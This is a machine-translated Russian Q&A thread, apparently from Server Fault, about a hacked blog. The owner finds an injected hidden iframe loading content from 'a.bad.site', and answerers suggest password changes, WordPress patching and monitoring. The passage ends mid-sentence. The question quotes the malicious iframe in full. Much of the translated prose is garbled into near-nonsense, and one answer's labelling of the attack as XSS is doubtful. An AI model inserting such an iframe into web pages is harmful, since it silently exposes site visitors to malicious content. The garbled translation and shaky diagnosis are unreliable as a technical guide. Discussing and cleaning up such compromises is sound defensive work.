Возможный дубликат:
Мой сервер был взломан АВАРИЙНАЯ СИТУАЦИЯ
Я получил эту странную страницу, которая, я уверен, была создана не мной:
<iframe src="http://a.bad.site:8080/ts/in.cgi?pepsi106" width=125 height=125 style="visibility: hidden"></iframe>
Где черт возьми, это откуда? Это вирус ??
Мой блог-сайт blog.domain.com был в порядке несколько недель назад. Но теперь, внезапно, когда я захожу в свой блог, он становится пустой страницей и отображается:
This is index.html
Кто-нибудь знает, как удалить его навсегда и предотвратить повторение этого на моем сайте?
Я видел такой iframe, встроенный прежде. Кто-то определенно угнал Вашу страницу и встроил ссылку. Удалите все ссылки на него, что можно найти, и изменять ВСЕ пароли.
Хостам дешевки никогда не нравится признавать, что они были взломаны, таким образом, я не буду ожидать много справки от них
Это - перекрестный сайт, Пишущий сценарий (XSS) нападение. Запустите чтение на них. Существуют некоторые большие скринкасты/видео вокруг об этом виде вещи также.
Основной момент не должен быть небрежным теперь. Ваш сайт имеет слабость, которая должна быть найдена и зафиксирована. Не возлагайте ответственность за него на свою хостинговую компанию также; скорее всего, это - Ваше собственное, принимают за выбор плохого механизма блога или не совершенствование хорошего механизма блога с последними патчами безопасности или выпусками.
Также: Вы, кажется, только знаете о "вирусах". Взламывание сервера не имеет отношения к вирусам. Проблемой является уязвимость. Старые версии Wordpress действительно имеют их---недавно очень плохой, который необходимо определенно обновить до патча. Вы могли бы хотеть изучить автоматические обновления системы защиты для своей ОС, программы, которые пошлют Вам по электронной почте список текущих уязвимостей в Ваших серверах и/или подпишутся на сайты CVE, которые предупреждают Вас обо всех последних программных проблемах.
По крайней мере, если Вы - admining сервер/сайт Linux, подписываетесь на некоторые администраторские сайты Linux, которые отправляют достойные статьи, которые преподают Вам новые навыки и предупреждают о новых проблемах. XSS был около долгого времени теперь.
В дополнение к предложениям Farseeker следуйте всем инструкциям в этом:
Объявление сервиса сообщества Предупреждения о вирусе
Для аудио, которому повреждают, вот текстовая версия сообщения.
Удалите файл "index.html" из своего индекса каталога. Может случиться так, что Ваш хост переключил индексный приоритет... с index.php (например), сначала к index.html.
Поскольку другие уже достаточно покрыли, что сделать о Вашей небольшой проблеме, наиболее важный момент, конечно, являющийся, чтобы сделать некоторое изучение, я не копирую их усилия. Я однако добавлю, что необходимо контролировать сайт. Очевидно взлом, возможно, произошел любое время за многие недели, все же Вы не знали о нем.
Существует много способов автоматически контролировать сайт для изменений, и необходимо будет выбрать метод, который будет работать с системой хоста. В случае, если Вы застреваете для идей, метод, который я использую, является сценарием оболочки, работающим на локальной машине, чтобы сделать следующий каждая ночь: